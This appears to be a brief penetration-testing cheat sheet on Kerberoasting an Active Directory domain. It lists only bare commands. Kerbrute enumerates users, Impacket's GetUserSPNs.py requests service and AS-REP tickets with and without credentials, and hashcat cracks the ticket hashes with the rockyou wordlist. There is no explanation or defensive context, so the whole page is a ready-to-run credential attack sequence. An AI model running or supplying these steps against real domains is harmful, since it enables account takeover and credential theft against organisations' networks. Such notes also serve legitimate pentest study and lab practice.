Kerberosting

Kerberos

klist

kinit qu35t

kerbrute userenum -d QU35T.pw --dc 10.10.10.10 users.txt

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password

GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password -request -outputfile tgs.hash

GetUserSPNs.py -usersfile users.txt -no-pass -dc-ip 10.10.10.10 qu35t.pw/

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

Last updated 2 years ago